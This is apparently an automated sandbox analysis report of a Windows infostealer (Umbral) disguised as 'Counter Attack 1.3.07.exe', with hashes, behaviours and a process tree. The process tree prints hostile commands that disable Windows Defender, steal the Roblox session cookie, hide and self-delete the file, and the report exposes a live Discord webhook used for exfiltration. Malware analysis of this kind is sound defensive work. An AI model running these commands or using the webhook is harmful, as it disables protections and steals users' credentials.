Analysis
-
max time kernel
149s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-01-2025 17:10
Behavioral task
behavioral1
Sample
Counter Attack 1.3.07.exe
Resource
win7-20240708-en
General
-
Target
Counter Attack 1.3.07.exe
-
Size
4.0MB
-
MD5
768fac5fc9b1a6723ec5e88643cfa69b
-
SHA1
ecadbe36d1526e2564eda430956b23d41b08e41a
-
SHA256
98d6a942ccc041bb0534b401fef09d82b4d2a4690673c325217457e625e6259b
-
SHA512
e4219e87335cccf156828c9271b6e619fc2f3ad848eb3a82ddc683679efb86e4575b2c0325ede1f3a06a533cb5bbdce75bd227ff46ee309902ba7e1554411690
-
SSDEEP
49152:NNEVtO1U1y1DDDDDD7Llngq7NNMqU0p2Vhk9aQNEVtO1U1y1DDDDDD7Llngq7NN0:NNEVJyZlng4p2VeNEVJyZlng4p2VMg
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1326955608112496710/UQehMk_daQ2YbkYBZ11umbBWXbi1b3G49GJ1zVYdBwPGpiZwYf8UJiTlt6xSrBCEwhJ_
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/1064-22-0x0000000000400000-0x0000000000809000-memory.dmp family_umbral behavioral1/files/0x0008000000016c7c-24.dat family_umbral behavioral1/memory/1400-25-0x0000000001250000-0x0000000001290000-memory.dmp family_umbral -
Umbral family
-
pid Process 2856 powershell.exe 380 powershell.exe 316 powershell.exe 2768 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 4 IoCs
pid Process 1692 Counter Attack 1.3.071.exe 2836 Extreme Injector v3.exe 1372 Extreme Injector v3.exe 1400 Umbral.exe -
Loads dropped DLL 5 IoCs
pid Process 1064 Counter Attack 1.3.07.exe 1064 Counter Attack 1.3.07.exe 1064 Counter Attack 1.3.07.exe 1692 Counter Attack 1.3.071.exe 1064 Counter Attack 1.3.07.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 7 raw.githubusercontent.com 8 raw.githubusercontent.com 12 discord.com 13 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Counter Attack 1.3.07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Counter Attack 1.3.071.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 112 cmd.exe 560 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2360 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 560 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1400 Umbral.exe 2768 powershell.exe 2856 powershell.exe 380 powershell.exe 720 powershell.exe 316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2836 Extreme Injector v3.exe Token: SeDebugPrivilege 1372 Extreme Injector v3.exe Token: 33 1372 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1372 Extreme Injector v3.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: SeDebugPrivilege 1400 Umbral.exe Token: SeDebugPrivilege 2836 Extreme Injector v3.exe Token: SeDebugPrivilege 1372 Extreme Injector v3.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: SeIncreaseQuotaPrivilege 2648 wmic.exe Token: SeSecurityPrivilege 2648 wmic.exe Token: SeTakeOwnershipPrivilege 2648 wmic.exe Token: SeLoadDriverPrivilege 2648 wmic.exe Token: SeSystemProfilePrivilege 2648 wmic.exe Token: SeSystemtimePrivilege 2648 wmic.exe Token: SeProfSingleProcessPrivilege 2648 wmic.exe Token: SeIncBasePriorityPrivilege 2648 wmic.exe Token: SeCreatePagefilePrivilege 2648 wmic.exe Token: SeBackupPrivilege 2648 wmic.exe Token: SeRestorePrivilege 2648 wmic.exe Token: SeShutdownPrivilege 2648 wmic.exe Token: SeDebugPrivilege 2648 wmic.exe Token: SeSystemEnvironmentPrivilege 2648 wmic.exe Token: SeRemoteShutdownPrivilege 2648 wmic.exe Token: SeUndockPrivilege 2648 wmic.exe Token: SeManageVolumePrivilege 2648 wmic.exe Token: 33 2648 wmic.exe Token: 34 2648 wmic.exe Token: 35 2648 wmic.exe Token: SeIncreaseQuotaPrivilege 2648 wmic.exe Token: SeSecurityPrivilege 2648 wmic.exe Token: SeTakeOwnershipPrivilege 2648 wmic.exe Token: SeLoadDriverPrivilege 2648 wmic.exe Token: SeSystemProfilePrivilege 2648 wmic.exe Token: SeSystemtimePrivilege 2648 wmic.exe Token: SeProfSingleProcessPrivilege 2648 wmic.exe Token: SeIncBasePriorityPrivilege 2648 wmic.exe Token: SeCreatePagefilePrivilege 2648 wmic.exe Token: SeBackupPrivilege 2648 wmic.exe Token: SeRestorePrivilege 2648 wmic.exe Token: SeShutdownPrivilege 2648 wmic.exe Token: SeDebugPrivilege 2648 wmic.exe Token: SeSystemEnvironmentPrivilege 2648 wmic.exe Token: SeRemoteShutdownPrivilege 2648 wmic.exe Token: SeUndockPrivilege 2648 wmic.exe Token: SeManageVolumePrivilege 2648 wmic.exe Token: 33 2648 wmic.exe Token: 34 2648 wmic.exe Token: 35 2648 wmic.exe Token: SeDebugPrivilege 2768 powershell.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 380 powershell.exe Token: 33 2836 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 2836 Extreme Injector v3.exe Token: SeDebugPrivilege 720 powershell.exe Token: 33 2836 Extreme Injector v3.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 1064 wrote to memory of 1692 1064 Counter Attack 1.3.07.exe 30 PID 1064 wrote to memory of 1692 1064 Counter Attack 1.3.07.exe 30 PID 1064 wrote to memory of 1692 1064 Counter Attack 1.3.07.exe 30 PID 1064 wrote to memory of 1692 1064 Counter Attack 1.3.07.exe 30 PID 1064 wrote to memory of 1372 1064 Counter Attack 1.3.07.exe 31 PID 1064 wrote to memory of 1372 1064 Counter Attack 1.3.07.exe 31 PID 1064 wrote to memory of 1372 1064 Counter Attack 1.3.07.exe 31 PID 1064 wrote to memory of 1372 1064 Counter Attack 1.3.07.exe 31 PID 1692 wrote to memory of 2836 1692 Counter Attack 1.3.071.exe 32 PID 1692 wrote to memory of 2836 1692 Counter Attack 1.3.071.exe 32 PID 1692 wrote to memory of 2836 1692 Counter Attack 1.3.071.exe 32 PID 1692 wrote to memory of 2836 1692 Counter Attack 1.3.071.exe 32 PID 1064 wrote to memory of 1400 1064 Counter Attack 1.3.07.exe 33 PID 1064 wrote to memory of 1400 1064 Counter Attack 1.3.07.exe 33 PID 1064 wrote to memory of 1400 1064 Counter Attack 1.3.07.exe 33 PID 1064 wrote to memory of 1400 1064 Counter Attack 1.3.07.exe 33 PID 1372 wrote to memory of 2764 1372 Extreme Injector v3.exe 34 PID 1372 wrote to memory of 2764 1372 Extreme Injector v3.exe 34 PID 1372 wrote to memory of 2764 1372 Extreme Injector v3.exe 34 PID 1400 wrote to memory of 2648 1400 Umbral.exe 35 PID 1400 wrote to memory of 2648 1400 Umbral.exe 35 PID 1400 wrote to memory of 2648 1400 Umbral.exe 35 PID 1400 wrote to memory of 2928 1400 Umbral.exe 38 PID 1400 wrote to memory of 2928 1400 Umbral.exe 38 PID 1400 wrote to memory of 2928 1400 Umbral.exe 38 PID 1400 wrote to memory of 2768 1400 Umbral.exe 40 PID 1400 wrote to memory of 2768 1400 Umbral.exe 40 PID 1400 wrote to memory of 2768 1400 Umbral.exe 40 PID 1400 wrote to memory of 2856 1400 Umbral.exe 42 PID 1400 wrote to memory of 2856 1400 Umbral.exe 42 PID 1400 wrote to memory of 2856 1400 Umbral.exe 42 PID 1400 wrote to memory of 380 1400 Umbral.exe 44 PID 1400 wrote to memory of 380 1400 Umbral.exe 44 PID 1400 wrote to memory of 380 1400 Umbral.exe 44 PID 1400 wrote to memory of 720 1400 Umbral.exe 46 PID 1400 wrote to memory of 720 1400 Umbral.exe 46 PID 1400 wrote to memory of 720 1400 Umbral.exe 46 PID 1400 wrote to memory of 1988 1400 Umbral.exe 48 PID 1400 wrote to memory of 1988 1400 Umbral.exe 48 PID 1400 wrote to memory of 1988 1400 Umbral.exe 48 PID 1400 wrote to memory of 628 1400 Umbral.exe 50 PID 1400 wrote to memory of 628 1400 Umbral.exe 50 PID 1400 wrote to memory of 628 1400 Umbral.exe 50 PID 1400 wrote to memory of 1132 1400 Umbral.exe 52 PID 1400 wrote to memory of 1132 1400 Umbral.exe 52 PID 1400 wrote to memory of 1132 1400 Umbral.exe 52 PID 1400 wrote to memory of 316 1400 Umbral.exe 54 PID 1400 wrote to memory of 316 1400 Umbral.exe 54 PID 1400 wrote to memory of 316 1400 Umbral.exe 54 PID 1400 wrote to memory of 2360 1400 Umbral.exe 56 PID 1400 wrote to memory of 2360 1400 Umbral.exe 56 PID 1400 wrote to memory of 2360 1400 Umbral.exe 56 PID 1400 wrote to memory of 112 1400 Umbral.exe 58 PID 1400 wrote to memory of 112 1400 Umbral.exe 58 PID 1400 wrote to memory of 112 1400 Umbral.exe 58 PID 112 wrote to memory of 560 112 cmd.exe 60 PID 112 wrote to memory of 560 112 cmd.exe 60 PID 112 wrote to memory of 560 112 cmd.exe 60 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe"C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe"C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 9883⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:1988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:628
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:316
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2360
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:560
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5ec801a7d4b72a288ec6c207bb9ff0131
SHA132eec2ae1f9e201516fa7fcdc16c4928f7997561
SHA256b65f40618f584303ca0bcf9b5f88c233cc4237699c0c4bf40ba8facbe8195a46
SHA512a07dd5e8241de73ce65ff8d74acef4942b85fc45cf6a7baafd3c0f9d330b08e7412f2023ba667e99b40e732a65e8fb4389f7fe73c7b6256ca71e63afe46cdcac
-
Filesize
231KB
MD569ac49033ce70c49a4615c5f32d3786e
SHA1e8088b02cf9c84c027854bf0a8c042764a53ee07
SHA256a233572b6ff043e804d6f2b8fb8e3a076d0e6558e723ad9d2a64e8811e129605
SHA5125456504e8e85afdb6a65570890440f85be458fceaf1c5831c3a5669335170ca290809d7741550377e2bb22c4e7b73828886757149158fb152d4be1a6051787a3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ef09f23772fdd8931a85be22d7892b36
SHA14565a28a1644d78c63e5bd0417d8dc7aba8d7083
SHA25656b801a54cf8bfbfcc06588458d41512dde894debbd3fcc4c701daf314975748
SHA51209a600f95fb431f63e8a93558dfe8bc0179a019962eedb5320e7fa700664a0fc96b6f6c93740dfbbcdbe46a27e0a0099b742a7d6d4851056e5a198671ff2a477
-
Filesize
1.9MB
MD569bead9cc091be0dffb03708ee18466c
SHA15c4940dddd513a8f75745d63f21fe53d9b22de49
SHA2563e23ae22cb0d4e7ba836cc3f26ad73a51ff9c2987944f08c6120aeefc608d69b
SHA51203ef8a187c7dd31979728d4a1fd544998f756df9f4af1e64d743f56ca42be648feac440246ff280cb7935cec2b5ecd500b2be69da47d6c598f3434f4c47a5f65